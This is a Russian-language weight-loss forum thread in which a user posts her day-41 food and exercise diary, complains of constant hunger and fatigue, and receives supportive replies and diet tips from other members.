Tiramisu
26.08.2015 22:10

Дневник питания и тренировок за 26.08.2015

День 41.

Буду ныть немножко, просто очень хочется поделиться с Вами. Вот и моя очередь пришла проходить это нелегкое испытание, при котором никакие советы не работают - только попытки подстроиться под организм и понять "Какого вообще происходит?  :o ". Стыдно, что сама что-то пыталась подсказать кому-то...

Я постоянно хочу есть.

На меня напал реальный жор. Думаю только о еде и все бесит.

Все вроде в порядке, дневник отличный, на сухари коллеги, сидящей в полметре (ах, ванильные, может даже с изюмом...тыща лет, и почему я их не ела до МЗР, как в детстве, пачками?), не позарилась. Даже на чешские конфеты не смотрела.

Вчера уже решила свои потуги с Трейси Андерсон по признаку усталости и потения (знаю, что это вообще не показатели, но мотивация мне нужна) - обозвала "Легкой аэробикой" вместо "Йоги". Я от нее очень устаю эти два дня, просто встать не могу. Ничего не болит так уж, но слабость сильная. И все бесит. Может это ПМС. Просто раньше вообще внимания не обращала на такие вещи, ничего не болит, значит здорова, грустно - ела, очень грустно - ела много, грусть вселенская - полтора килограмма салата со сметанкой и сыром решат все. Перепады настроения и слабость? Да ну, а что бывает по-другому и утро бывает доброе, серьезно? Не, не слышала.

Все приемы пищи съедаю раньше времени, перемежая большим количеством воды. И с тоской смотрю на оставшуюся еду и бедненький вечерний перекус. Хотя сегодня забыла творожок и вечером было веселее. Но теперь пасьянс дается с трудом - и почему еды так мало? 

Сдаваться вообще не собираюсь, просто нахожусь в некоторой растерянности. Если это метаболизм - неужели теперь это навсегда? Если ПМС - грустно, но пройдет. Если это после выходных на даче что-то качнулось (началось именно позавчера, невыносимо так), значит подождем еще. Если это Трейси Андерсон, серия 2 (что маловероятно) - подождем тоже. 

В общем, кручу пасьянсы, жду, утром йога, вечером Трейси, на работу с работы - по 15-20 минут ходьбы. Терпим, ждем.

Хорошего всем настроения, спокойной легкой ночи, по-настоящему доброго утра и облегчения от всех тревог и волнений во время тренировок, о как! 

Завтрак

Кол-во Калории Белки Жиры Углеводы
Вода водопроводная питьевая
2000
0 0 0 0
Кофе натуральный, молотый
14
28.1 1.9 2 0.6
Морская капуста (ламинария) сушеная
8
15.1 0.6 0.1 1.8
Миндаль
6
36.5 1.1 3.2 0.8
Банан
119
114.2 1.8 0.6 25
Помидор (томат), парниковый
200
28 1.2 0 7.6

Утренний перекус

Кол-во Калории Белки Жиры Углеводы
Пшеничные отруби, сырые
25
82.5 3.8 0.8 15

Обед

Кол-во Калории Белки Жиры Углеводы
Грудка цыпленка-бройлера (филе) (Тушение)
47
50.7 8.5 1.8 0.1
Морковь желтая
67
20.1 0.9 0.1 4.2
Лук репчатый (Варка без слива)
63
24.2 0.9 0.1 4.8
Рис бурый
35
126.7 2.6 0.9 26.7
Шпинат (Варка без слива)
45
9.9 1.3 0.1 0.8
Соевый соус Терияки
10
7.2 0.3 0 1.5
Масло сливочное топленое, 99% жирности
6
53.5 0 5.9 0
Соль поваренная пищевая
1
0 0 0 0
Хмели-сунели
2
8.4 0.1 0.8 0.2

Дневной перекус

Кол-во Калории Белки Жиры Углеводы
Яйцо куриное вареное вкрутую
109
173 14 12.7 0.8
Яйцо перепелиное
20
31.6 2.6 2.2 0.1
Помидор (томат), парниковый
150
21 0.9 0 5.7
Говядина 1 кат. (Тушение)
5
10.4 0.9 0.8 0

Ужин

Кол-во Калории Белки Жиры Углеводы
Грудка цыпленка-бройлера (филе) (Тушение)
47
50.7 8.5 1.8 0.1
Морковь желтая
68
20.4 0.9 0.1 4.2
Лук репчатый (Варка без слива)
63
24.2 0.9 0.1 4.8
Рис бурый
35
126.7 2.6 0.9 26.7
Шпинат (Варка без слива)
45
9.9 1.3 0.1 0.8
Соевый соус Терияки
10
7.2 0.3 0 1.5
Масло сливочное топленое, 99% жирности
6
53.5 0 5.9 0

Вечерний перекус

Кол-во Калории Белки Жиры Углеводы
Морковь желтая
218
65.4 2.8 0.2 13.5
Хлеб ржаной подовый (из обдирной муки)
19
40.7 1.3 0.1 4.8
Сыр литовский
21
60.6 6.6 3.8 0
Подсолнечное масло
14
125.9 0 14 0
Соль поваренная пищевая
1
0 0 0 0
Чеснок
2
3 0.1 0 0.6
Творог мягкий диетический 4,0% жирности
247
196.1 17.3 12.4 4
Чтобы увидеть отчеты по питанию и график веса, необходимо войти.

Первая тренировка

йога
1
Итог
Время
31
31
аэробика легкая
1
Итог
Время
25
25
Результаты за день
Энергозатраты: 196 ккал
Время: 56 мин
 25 
 104
Мари (164/61/36) 26.08.2015 23:10
Крепитесь, такое у всех бывает. Пройдёт. И не корите себя. Всё будет офигенно!
Я вот для себя выбрала день вседозволенности (воскресенье), в меру конечно
Выходной, вся семья дома, сложно удержаться от излишка. И я решила делать день загрузки. Помимо обычных приёмов пищи, ем фрукты, в которых обычно себе отказываю, т.к. это лишние калории. Балуюсь мороженным.
Ставлю себе потолок по норме энергозатрат. И от физ нагрузок в воскресенье тоже выходной.
Настроение отличное на всю следующую неделю
Mary 26.08.2015 23:13
Tessa Wood, у меня такое началось как я вышла на работку, приходится есть всего 3 раза в день,причем очень плотно, чтоб не оголодать с завтрака до обедаи с обеда до  ужина, я так уже 5 день питаюсь, поначалу было терпимо, а сейчас уже часа через два снова хочу есть. на перекусы, к сожалению, времени не остается =( вот думаю, может это таки из-за больших порций и 3х разового (а не 6 как обычно) питания?
Инна VM 27.08.2015 05:29
Замечательный рацион. А то, что жор напал - так это временно, у всех бывает, вроде и калораж хороший, и нутриены в норме, но чего-то хочется, хочется... Всегда вспоминаю слова Поля Брега: Плоть глупа! Надо побеждать ее разумом. Хотя советы давать легче всего. Я всю неделю питаюсь правильно, рацион распланирован на неделю вперед, но в выходные, когда все дома и весь день провоцируют, обязательно вредного съем, просто стараюсь не много и медленно жевать, ведь сигнал о чувстве насыщения в мозг поступает в течение 20 минут после еды. Но при этом калорийность не превышала ни разу, только процентовку БЖУ. И после выходных иногда даже отвес бывает. Так что иногда полезно что-либо вредное схомячить, организм успокоить, компромисс с ним найти. 
Liones 27.08.2015 06:39
Дорогая (можно так обратиться? уж настолько я к вам тут привыкла ), во-первых не раскисайте! Как вам правильно тут уже написали, все через это проходят. Во-вторых вопрос у меня: а вы совсем себе не позволяете вкусняшек которые раньше любили? Может мозг тоскует по вредному и мучает голодом вас? 
И еще
Tessa Wood написал:
полтора килограмма салата со сметанкой и сыром решат все

может на выходном сделаете себе такой рацион, раз уж это антидепрессант был для вас?

А вообще по честному, у меня такое самочувствие было один раз, когда добавила час велотренажера утром (а раньше занималась всегда вечером). Мучилась четыре дня, плюнула, скорректировала занятия, и стала заниматься только вечером, а на утро оставила пресс и махи ногами в постели после пробуждения. Мне этих пяти минут для бодрости хватает, но и голод прошёл сразу. Может у вас тоже что то подобное? Или вы всю жизнь занимались два раза в день и организм должен был давно привыкнуть? Не мучайте себя, вам должно быть комфортно в процессе сброса веса, и вообще по жизни! Удачи!
светлана 27.08.2015 07:21
Tessa Wood написал:
Сдаваться вообще не собираюсь, просто нахожусь в некоторой растерянности. Если это метаболизм - неужели теперь это навсегда? Если ПМС - грустно, но пройдет. Если это после выходных на даче что-то качнулось (началось именно позавчера, невыносимо так), значит подождем еще. Если это Трейси Андерсон, серия 2 (что маловероятно) - подождем тоже.

Не сдавайтесь   и ПМС , возможно, и луна. Может на работе что-то .  В любом случае нужно  переждать,  до выходных силы воли набраться ,а там дома легче станет) Или в выходные скорректировать рацион и добавить антидепрессант.
Только не сдавайтесь - всё будет хорошо!  
Фотина 27.08.2015 07:33
я вчера вечером была у стоматолога, удачно зубик залечила, получилось, что до 21 есть не рекомендовали, а после этого времени не хотелось да и поздновато. Вот так у меня получился полуразгрузочный день. Зато сегодня утренняя каша с брусникой показалась великим деликатесом. 
У меня та же проблема  в преддверии КД. Хорошо мужикам никакого  тебе ПМС. А тут тошнит, спать хочется, сил ни на что нет. Хочется себя пожалеть и объесться сладким. Но мне даже этого нельзя. У меня болит правый и левый бок. Думала панкреатит. Но не похоже. Началось все после моего похудания тут. Может, сливы переела или баклажан. Вторую неделю никаких вредняшек. В пн все же к врачу пойду. Все злит, и хочется всех поубивать...Как стать миролюбивей не знаю. Раньше конфетки помогали.
Tiramisu 27.08.2015 08:41
Ирина Барковская, ой-ой, точно! Оно мне надо? Сдается я перетрудилась вдобавок, каждый день пусть и посильно, но больше часа занималась, полтора с перерывами. Буду уменьшать, а то уже тяготиться начинаю, очень меня подкашивает новая серия фитнеса с тренером, утром очень тяжело вставать, все ноет. Буду думать, может и правда, лучше плюшек поменьше   Удачи Вам!
Tiramisu 27.08.2015 08:42
Ирина Барковская, спасибо за наблюдение! Может и правда? Ох, спасибо, что отозвались, не одна я такая хрумкаю. 
Tiramisu 27.08.2015 08:44
Мария Мария, спасибо за идею! Стоит попробовать! 
Tiramisu 27.08.2015 08:44
Мария Мария написал:
Всё будет офигенно!

Спасибо! И Вам удачи! 
Tiramisu 27.08.2015 08:45
repka, вполне возможно! Для меня еда все-равно все еще приятность такая, так что если долго не ем - грустно, вроде как время тогда не структурировано.
Tiramisu 27.08.2015 08:48
Tessa Wood, прикольная статья. И ведь правда. У меня все бабульки такие чахнущие. Всю жизнь что-то болит, на что-то жалуются, а живут до 90 лет. А есть те, кто ничего не подозревал. 40 лет. И инфаркт и на кладбище.
Tessa Wood, держаться поздняк. Схомячила половинку зефирки с чаем. полегчало. Была бы пачка под рукой. Может, все бы не обошлось миром, но на работу все строго по норме. Правда планировала в обед. Но решила лучше устроить сладкие перекусы сегодня. Сейчас зефирка. После обеда заготовленная мармеладка. НО я хочу шоколад, который низзя!!! Ломка уже вторую неделю. Почитала всему виной эстроген будь он не ладен. Его уровень падает перед КД. Раньше, до МЗР даже внимания не обращала. Вточила плитку шоколада и нормуль. А тут...считаешь каждую зефирку...
Людмилка 27.08.2015 09:09
Tessa Wood, у меня недавно было то же самое Вы меня здорово поддержали! Хочу то не знаю что ! Стиснуть зубки и пережить это время думаю дня три хватит.Выкарабкивайтесь
Ирина Чернова 27.08.2015 09:10
а как вы фиксируете йогу в журнале тренировок?
Rocksa 27.08.2015 09:32
Tessa Wood написал:
Если ПМС

конечно он) И увеличение аппетита и перепады настроения, это все он)) Держитесь) Не поддавайтесь на эти уловки организма)) Побольше положительных эмоций старайтесь создавать себе в эти дни)) И даже перед тем как на что то злиться, подумайте что у вас сейчас ПМС и это не вы злитесь (хотите кушать), а просто игра гормонов))

Завидую мужикам в этом плане. Ни ПМСа, ни самих КД, не надутого живота и отечности до 2 недель из 4... эх... И мышцы у них лучше растут и метаболизм быстрее. Несправедливость)
Tessa Wood, Спасибо за ссылку на статью. Олеся, Согласна с вами.Учусь жить у 90-летних бабулек!
Rocksa, вот-вот. и вес им сложнее набрать и проще сбросить.
Tiramisu 27.08.2015 10:34
Инна VM написал:
Так что иногда полезно что-либо вредное схомячить, организм успокоить, компромисс с ним найти.

Точно! Отличный у Вас подход 
Tiramisu 27.08.2015 10:35
Liones666 написал:
Дорогая (можно так обратиться? уж настолько я к вам тут привыкла )

Как тепло от Ваших слов! Спасибо, что замечаете и видите меня, это очень важно. 
Нилли 27.08.2015 10:43
У меня такие бывают времена... Но я не удерживаюсь и это печально ((( А ежели позволишь с утра сладенького то весь день тянуть будет(((.
Иногда у меня получалось справляться так: Отруби с 1% кефиром до отказу(чтобы полностью быть сытой) а потом все что хочу, но в 4-ре раза меньше чем обычно.. Т.е если зефирка до пол половинки, если печенька то тоже пол половинки и т.п.-НО КУШАТЬ МЕДЛЕННО ПРОСТО СМАКОВАТЬ))) И ощущение что поела что хотела)))
УДАЧИ ВАМ
Tiramisu 27.08.2015 10:43
Liones666 написал:
Во-вторых вопрос у меня: а вы совсем себе не позволяете вкусняшек которые раньше любили?

Вообще позволяю все, даже пиво, но из-за ограниченной калорийности стала какая-то жадная, жалко на чипсы тратить , а 30 грамм - это несерьезно  . Хотя я понимаю к чему Вы ведете, неделю или две назад пришла домой - дико захотелось мороженого брикет, съела весь, еще и вареньем полила. Перераспределила запланированный рацион, все получилось. Но это была пятница и настроение было веселей, были ресурсы ограничить немного себя вечером, чтобы войти в коридор и уменьшить рейтинг. А в будни такая тоска накатывает, что вечерняя вкусняшка лишит меня еды днем. Конечно, я перегибаю. Иногда можно дефицит дневной сделать не 500, а 300, вот и запас. А хочется-то 500 каждый день  . И мне казалось, что я так могу, но вот сейчас что-то подкосило. Надо, наверное, с идеализацией КБЖУ бороться. И делать Трейси через день, разнести йогу и Трейси по дням, а то слишком долго каждый день. 
Кстати, чего хочу сказать по поводу. Лучше не мучить себя весь день, запрещая вкусняшки. А то потом обжирун настигает. Так было в прошлый раз. А сегодня съела зефирку с чаем и все нормуль. И безумное желание сожрать все съедобное пропало. Тьфу-тьфу, чтобы не сглазить. Наверное, все же в ПМС лучше позволить себе одну другую вредняшку, чем мучить себя и окружающих и слететь с катушек. Да и самочувствие стало лучше. Появился позитив в настроении. Сейчас обедом себя побалую. Тефтельками, любимым салатиком из свеклы. И вообще, вечером не захочется себя жалеть килограммом конфет.
Tiramisu 27.08.2015 10:48
Liones666 написал:
может на выходном сделаете себе такой рацион, раз уж это антидепрессант был для вас?

Я его и сейчас каждый день старалась делать, не полтора кг, конечно, но грамм 600-700 выходило. Заменила на подсолнечное масло и настал 100% витамин Е с грустью  . Вчера вечером вообще пришлось помидоры заменить на морковку в салате, забыла сходить в магазин (что невероятно, устала, видимо). Морковка с подсолнечным маслом - это такая тоска   Пожалуй верну, пока сезон, сметанные салаты с помидорками! А масло, ну масло, не знаю, придумаю что-нибудь. Спасибо за поддержку!
Tiramisu 27.08.2015 10:54
Liones666 написал:
Или вы всю жизнь занимались два раза в день и организм должен был давно привыкнуть?

ой-ой  :o я только начала так активно заниматься, и Трейси своей второй серией меня ушатывает как раз третий день, я после нее стала еле вставать. Сегодня вот с утра все ноет, плечи, руки, бока талии и нижняя часть спины с бедрами. Пока с утра готовила - все время промахивалась и роняла что-нибудь. Может мне правда этого много? Я просто думала, что я так, балуюсь. Но ведь я совсем нетренированная... Спасибо, что сказали про свой опыт занятий утром и ощущения, у меня очень похожее. Я думала - ну да 25 минут попотеть, помахать, ну быстро, ну вспотела и тяжело, но это же 25 минут! Ну-ка встала в 5.30 и 30 минут йоги сделала - это ж легкотня! Что-то я переоценила силы и недооценила усилия. Все. Решено. Буду чередовать - день Трейси, день йоги и никаких утренних подъемов пока, не хочу.  Спасибо за то, что поделились, в точку!
Tiramisu 27.08.2015 10:56
Liones666 написал:
Не мучайте себя, вам должно быть комфортно в процессе сброса веса, и вообще по жизни!

Точно! Сама же это и говорю всем, а тут вот эксперимент не удался. И правда, смогу ли я в таком режиме жить? Нет. Буду подстраивать его под себя. Поучительная история, о том как не надо на себя слишком много брать и учитывать СВОИ ограничения. Вы очень помогли и поддержали! 
Tiramisu 27.08.2015 10:57
светлана зякина, спасибо! Не буду сдаваться, буду под себя подстраиваться))) Снижу активность, сделаю режим покомфортней. 
Tiramisu 27.08.2015 10:58
Liones666 написал:
добавила час велотренажера утром (а раньше занималась всегда вечером). Мучилась четыре дня,

Вы мой герой))) Ударник труда и силы воли! 
Tiramisu 27.08.2015 11:00
Олеся написал:
Раньше, до МЗР даже внимания не обращала. Вточила плитку шоколада и нормуль. А тут...считаешь каждую зефирку...

Да я вообще на какие-то там циклы свои внимания не обращала, думала все хаотично и бессистемно. И да, вточил шоколадку 
Tiramisu 27.08.2015 11:03
Людмилка, спасибо! Выкарабкаюсь с такой поддержкой! пути назад нет. Подобрею к себе и выкарабкаюсь. Налажу режим тренировок и сна.
Tiramisu 27.08.2015 11:05
Нилли, спасибо! Хороший способ, если вредностей хочется.   
Tiramisu 27.08.2015 11:06
Олеся написал:
Сейчас обедом себя побалую. Тефтельками, любимым салатиком из свеклы. И вообще, вечером не захочется себя жалеть килограммом конфет.

Лёлька 27.08.2015 11:26
  Очень-очень Вам сочувствую((( Советов дали очень много и все дельные, поэтому советовать ничего не буду, просто поделюсь своим опытом, потому что вижу, что некоторые общие нити проскальзывают)
 С детства меня всегда преследовал комплекс "отличницы", могла горько реветь из-за 4 за контрольную или диктант))) маленькая-глупая)))
 Уже будучи замужем, хотелось, чтоб всё и везде было идеально, всё упорядочить и систематизировать))) Но мне оооочень повезло с мужем))) Он не поддавался никаким изменениям, всегда оставался собой и просто меня любил всегда и любую))) И постоянно мне твердил: "Не нужно ничего усложнять там, где всё очень просто")) :k:
  Когда 7 лет назад я бросила курить и набрала за месяц 12 кг, то рьяно взялась бороться с весом по всем фронтам, пытаясь опять же сделать всё правильно и и так, как положено... Я бегала, плавала, занималась танцами, йогой, пилатесом, если ничем не занималась в какой-то день, то даже уснуть толком не могла, очень переживала, что день прожит зря...совсем исключила всё сладкое и мучное... Конечно, я вернула свои 57кг, но какими усилиями... После всех этих издевательств над собой мне кусочек обычной пиццы казался божественной пищей)))                                                                                                               Сейчас я худею с комфортом))) Могу себе позволить весь день проваляться с книжкой, если чувствую, что очень устала и хочется полениться) Могу позволить себе шоколадный чизкейк и мороженое, наслаждаюсь всем этим))) Когда энергии через край, переделываю океан разных дел и для себя, и для близких)))
 Успехов Вам во всём, пусть весь негатив уйдёт навсегда, оставив только жизненный опыт, улыбок Вам от всей вселенной, тепла и поддержки от всего, с чем соприкасаетесь))) 
Tiramisu 27.08.2015 12:08
Ирина Чернова, там есть такой вид деятельности "Йога". Я лично считаю только минуты, когда начинается какая-нибудь активность. Сидим-лежим-дышим не считаю.
Tiramisu 27.08.2015 12:12
Эва Лаптева написал:
Успехов Вам во всём, пусть весь негатив уйдёт навсегда, оставив только жизненный опыт, улыбок Вам от всей вселенной, тепла и поддержки от всего, с чем соприкасаетесь)))

Какие мудрые прекрасные слова от Вас! От всего сердца спасибо за такую теплую поддержку!  И огромная благодарность за то, что поделились своим опытом, буду добрее к себе и буду учиться делать наполовину без чувства "недостаточно для..." 
Майя Кукс 27.08.2015 18:38
Почитала комментарии, и даже легче стало. Может, все не так плохо
Мне кажется, что на этапе "1-2 месяца с МЗР" через подобное состояние проходят все. Организм "удивляется" новым пищевым навыкам: привычка против воли. Держитесь! Потом станет легче!!! Появится новая пищевая привычка.
Liones 27.08.2015 20:16
Tessa Wood написал:
жалко на чипсы тратить , а 30 грамм - это несерьезно .

 очень понимаю, о чем вы)) и правда - 30 грамм, это не серьёзно
Tessa Wood написал:
Надо, наверное, с идеализацией КБЖУ бороться

Ну не бороться, а по умерить свой пыл)) ну не получится сегодня 500 кк в дефиците, а только 420, все равно вес в низ идёт. Я анализирую свой график снижения веса, и могу вам сказать, что дефицит от 350 до 550 калорий ежедневно за две недели, и дефицит 500 кк стабильно каждый день тоже две недели дали одинаковое снижение веса (был у меня эксперимент, люблю я всё опытным путём устанавливать ).
Еще раз напоминаю о комфортности жизни, ну стремитесь вы к идеалу, это похвально, только вот задумайтесь на минутку, вы так сможете каждый день из года в год? Каждый день из года в год отслеживать свой рацион и давать своему организму четко выверенное количество калорий? Нет, да? И чего тогда сейчас насиловать свой мозг, и думать а том, будет у вас сегодня дефицит в 500 кк или только в 470? Побольше комфорта в нашей жизни не помешает
Tessa Wood написал:
Пожалуй верну, пока сезон, сметанные салаты с помидорками!

Правильное решение!  Реабилитировали вкусняшку в вашем рационе!
Tessa Wood написал:
Буду чередовать - день Трейси, день йоги и никаких утренних подъемов пока, не хочу.

Поддерживаю, поступила бы так же)) Лучше выспаться, и вечером отпахать нормальную тренировку, чем как сонная черепаха ходить весь день от недостатка сил.
Tessa Wood написал:
Поучительная история, о том как не надо на себя слишком много брать и учитывать СВОИ ограничения.

Отлично подметили, всегда и всё подстраивайте под себя, именно вам должно быть комфортно, и всегда учитывайте свои желания и возможности. Хотя говорят, что человеческие возможности практически безграничны, было бы желание (Но вот морковку с растительным маслом я бы не съела, это выше моих возможностей, тут - вы мой герой! :bravo
Liones 27.08.2015 20:25
Tessa Wood, да какой герой, я себя обычно называю ленивой попой, ну ладно, просто иногда мне лень))) На велотренажере заниматься мне НРАВИТСЯ, я включаю киношку, и поехали  Променяла беговую дорожку на велотренажер, и не нарадуюсь, бегать я себя заставляла, и каждый раз через "не хочу", а вело - это кайф, и позанималась, и развлеклась)) Найдёте и вы для себя любимую нагрузку, если попробуете и то, и это, и пятое и десятое. Главное, чтоб вам "в кайф" было чем то заниматься, тогда и результат будет. Вот вы например йогой заниматься начали, а я вот уже года два "вокруг хожу", вроде хочу попробовать, но что то всё торможу. Вот сейчас вас послушаю-послушаю, и тоже попробую! 
Tessa Wood написал:
Вы очень помогли и поддержали!

Очень рада))) всегда готова))
Limon99 27.08.2015 21:11
Liones666 написал:
я себя обычно называю ленивой попой

Вы себя лучше царицей Савской называйте, а ленивой попой кого-нибудь другого .
Liones 27.08.2015 21:19
Limon99 написал:
Вы себя лучше царицей Савской называйте, а ленивой попой кого-нибудь другого .

ахаха, договорились))) хотя и ленивой я себя любя называю, у меня вообще лень - это двигатель прогресса в моей жизни)) 
Limon99 27.08.2015 21:24
Liones666, любой нормальный человек сачканёт всегда, если для этого есть возможность
Liones 27.08.2015 21:25
Limon99,  точно точно
Александр 27.08.2015 22:13
Очень много комментариев. Может спрашивали люди, не читал все.
Скажите пожалуйста, воду вместе с едой не потребляете? Сколько проходит после еды времени, когда вы начинаете пить?
Tiramisu 27.08.2015 23:01
Юлия Смолкина написал:
Держитесь! Потом станет легче!!! Появится новая пищевая привычка.

Спасибо! Надежда есть 
Tiramisu 27.08.2015 23:02
Александр Дмитриевич, если честно, знаю, что запивать нельзя, но пью бессистемно, и во время и после и вместо. Расскажите, как надо, если есть такие знания, пожалуйста. И как это влияет на организм?
Tiramisu 27.08.2015 23:06
Liones666 написал:
(Но вот морковку с растительным маслом я бы не съела, это выше моих возможностей, тут - вы мой герой! )

Спасибо большое за такой теплый комментарий, я аж взбодрилась, такая Вы добрая! А морковка была и выше моих сил, но вариантов было немного - квест - как собрать много жира и углеводы без белка и похода в магазин 
Валентина 27.08.2015 23:09
Rocksa, а еще они детей не рожают 
Валентина 27.08.2015 23:13
Tessa Wood, вот ия пищу запиваю водой, но воду могу пить и до  еды, и вместо еды. И вообще я вообще водохлеб
Tiramisu 27.08.2015 23:14
Rocksa написал:
И даже перед тем как на что то злиться, подумайте что у вас сейчас ПМС и это не вы злитесь (хотите кушать), а просто игра гормонов))

Спасибо! Дожилась, жила и не знала, что вот оно как, видимо, заедала все эти моменты плотненько и была добрая и размякшая. Теперь можно сказать первый раз за 30 с гаком лет понимаю, что таки-да, ничто девочковое мне не чуждо.
Limon99 27.08.2015 23:15
Александр Дмитриевич написал:
Сколько проходит после еды времени, когда вы начинаете пить?

Нет специального отсчёта, но само собой получается через час минимум, т.к. при достаточном потреблении овощей после еды особо пить не хочется. А если захочется, несколько глотков сделаешь. Ну и когда соль в меру, тоже не очень пить хочется. Лично сам пью чай два раза за час до обеда и в 17-18 часов по две чашки\бокала.
Tiramisu 27.08.2015 23:16
Валентина, точно, я водяной! Хотя раньше могла и забывать пить. А как стала регулярно пить с МЗР, заливаюсь только так. 
Liones 27.08.2015 23:16
Tessa Wood написал:
такая Вы добрая!

да лааадно! правду говорю, это не от доброты, а просто как есть  я на такие подвиги, с морковкой, не способна))) (вам ко мне можно на "ты" уже, ну мне всего 27, чувствую себя старовато от ваших "вы":хихикаю
Tiramisu 27.08.2015 23:20
Liones666, хорошо! Будем на ты с тобой   
Василий 27.08.2015 23:21
Екатерина 28.08.2015 01:27
У меня неумолимое желание поесть на протяжении несколких дней было только несколько раз в жизни, а именно в самые первые недели беременностей .
А вообще МЗР пробую несколько недель и возможно у меня все еще впереди
Хотя МЗР соблюдать легче, чем здоровое питание по Татьяне Малаховой. (Кстати оно действительно здоровое и там все очень правильно написано, рекомендую)
  
Кстати, по поводу воды:
ее желательно пить за 15-20 минут до еды, и не ранее чем за 40-60 минут после еды. Таким образом она гормонично взаимодействует с пищеварением. А если запивать и пить после еды (это как огонь водой поливать) то пищеварение сильно замедляется.
Удачи! Желаю вам выдержать жор!!! (говорю я сейчас, со своей высокой колокольни, посмотрим как я запою, когда на меня вдруг тоже жор нападет
Инна VM 28.08.2015 03:51
Tessa Wood, я тоже первые две недели такой жуткий режим тренировок себе установила, что еле ползала от усталости. Вес конечно очень быстро уходил, но состояние было такое раздражительное, прям покусала бы кого-нибудь... А потом сократила все вдвое, добавила ежедневную ходьбу не менее 5 км и снова жизни радуюсь!
Tiramisu 28.08.2015 08:22
Инна VM 28.08.2015 09:02
Liones666, спасибо за идею с велотренажером. Мне тоже на беговой дорожке скучно, ее к телевизору не подтащишь - очень тяжелая. А велотренажер к телику - классно, я бы не додумалась! 
Таня 28.08.2015 10:06
Как я Вас понимаю...
Одно вдохновляет: после похудения можно будет перейти на сбалансированное питание ( а там поболе углеводов отмеряно ).
Так что стараюсь решить проблему жора психологически - ловлю себя на мысли что каждый переедон не приносит результат, а отдаляет более полное питание. Мол, подождать надо, что-ли))...
Tiramisu 28.08.2015 10:14
Таня, только тем и живем))) Я просто надеюсь, что через недельку или раньше все вернется как было и это не обмен веществ ускорился, или мне придется всегда быть полуголодной... Хочу как раньше, все распределила и не шныряю весь день по сусекам 
trelena 28.08.2015 10:39
Эва Лаптева написал:
Могу себе позволить весь день проваляться с книжкой, если чувствую, что очень устала и хочется полениться) Могу позволить себе шоколадный чизкейк и мороженое, наслаждаюсь всем этим))) Когда энергии через край, переделываю океан разных дел и для себя, и для близких)))

И я так делаю. Бывают просто не мои дни, когда делать ничего не хочется и не можется. Иногда даже не дни, а какой-то довольно длительный временной период. Но я знаю, что это временно. Затем последует период, когда готов горы свернуть. Дела все делаются быстро и незаметно.
Tessa Wood написал:
Я просто надеюсь, что через недельку или раньше все вернется как было и это не обмен веществ ускорился, или мне придется всегда быть полуголодной...

Это пройдет. А сейчас дайте организму послабление. Не перенапрягайте, не накапливайте усталость. У меня это проявляется бессонницей. 2-3 часа сна в сутки. Это так выматывает!
Таня 28.08.2015 10:42
Tessa Wood, ох уж эти сусеки....  всегда что-то там можно намести)))))
Chiara Grace 28.08.2015 11:07
Почитала - что Вам тут написали, со многим могу согласиться. Мне, собственно, давно хотелось Вам написать - что Вы напрасно недооцениваете свои нагрузки. Постоянно делите их напополам, говоря, что все как-то не так и "капельно". Прям вот спросить хотелось - Вы думаете, что спустя месяц другой Вы начнете заниматься ежедневно по  три часа - и тогда станете записывать все полноценно? Или Вы думаете, что человек у которого изначально растяжка лучше Вашей при выполнении того же упражнения затрачивает больше энергии, чем Вы? И еще - если читать только Ваши посты описывающие Ваши взаимоотношения со спортом - ощущение, что пишет большая неповоротливая тетя, и вес ваш - килограмм 120 минимум (не в обиду тем, кто действительно весит столько, и допускаю, что и в этом весе есть очень подвижные и энергичные люди, просто не знаю как иначе описать складывающееся ощущение). Но ВЫ-то ровно вдвое стройнее. Вы молоды, красивы, и судя по всему находитесь в рамках нормы. Вы ежедневно затрачиваете около часа-полутора на занятия (если учесть, что их раньше не было вовсе - то какие бы они ни были - они должны давать эффект), Ваши рационы скрупулезно просчитаны...  Месяца через полтора-два таких радикальных изменений неизбежно накапливаются вопросы о том, Как совместить старые привычки и реальную жизнь с новыми, фактически - наскоро придуманными правилами. Вопрос не в том, Что Вы чего-то не смогли, или  собираетесь сдаться. Вопрос в подгонке выбранного режима к ежедневным реалиям. Только тогда, когда новые правила сумеют органично вписаться в Вашу жизнь - тогда они и начнут работать и приносить результаты на длительном промежутке времени.
Почему-то уверена - что все у Вас получится, Вы уже многое знаете и умеете, найдете подходящую конкретно для Вас золотую середину, и все станет еще гармоничнее и эффективнее.
Надеюсь, что была не слишком резка - просто не хочется - не поднывать за компанию, ни корить Вас, ни настаивать на стиснутых зубах. Зная Вас, Как очень благожелательного и гармоничного человека - очень хочется и дальше Вас наблюдать именно такой))
Tiramisu 28.08.2015 11:19
Елена Третьякова написал:
Это пройдет. А сейчас дайте организму послабление. Не перенапрягайте, не накапливайте усталость.

Спасибо! 
Chiara Grace 28.08.2015 11:25
кое-что о женском организме:

1-я фаза: время сесть на диету

Эта фаза начинается примерно на 2-3-й день КД и длится около 2-х недель. В этот период в женском организме постепенно растет количество женских половых гормонов (эстрогенов). Эти две недели – лучшее время не только для того, чтобы начать новую жизнь и придерживаться здорового питания, но и вообще для любых подвигов, требующих большого количества энергии и хорошего настроения. В этот период можно особенно активно заниматься спортом, а если вы им еще не занимаетесь – то начать это полезное дело. 
обменные процессы в организме в этой фазе также ускоряются, а значит у вас есть шанс получить довольно ощутимый эффект от своей активной программы по расставанию с лишними килограммами. В среднем потеря может составить около 2-2,5 кг. Это при условии вполне разумной диеты, не связанной с голоданием.

2-я фаза: время немного расслабиться
с 15-го дня цикла уровень эстрогена в женском организме начинает постепенно снижаться.
В этой фазе можно лишь немного увеличить количество калорий, изредка позволяя себе отступления от диеты. Что касается спорта, то в этот период лучше отказаться от тренажеров и силовых упражнений, отдав предпочтение аэробике, шейпингу, плаванию, бегу и велосипеду

3-я фаза: время для небольшого обжорства
к концу этой фазы ваш вес неизбежно немного вырастет. Но обычно этот рост имеет отношения к увеличению запасов воды, а вовсе не жира. Дело в том, что в этот период наш организм задерживает довольно большое количество жидкости, от которой благополучно избавится, как только перейдет в следующую фазу. 
Законы обжорства
Закон глазированного сырка если вам вдруг безумно захотелось съесть, к примеру, достаточно калорийный глазированный сырок, не стоит заменять его обезжиренным йогуртом.
Закон любви к углеводам перейдите в это время с белковой диеты на углеводную. То есть, ограничьте количество мяса, рыбы, яиц и т.д., а увеличьте объем овощей, фруктов и круп. При этом рацион стоит составлять так, чтобы общая калорийность сильно не увеличилась
Закон малых доз Чем чаще вы едите, тем меньше колебания уровня сахара в крови, перепады настроения и приступы голода

http://www.stroynost.com/publ/kogda_saditsja_na_dietu/3-1-0-476
Tiramisu 28.08.2015 11:51
Chiara Chiara написал:

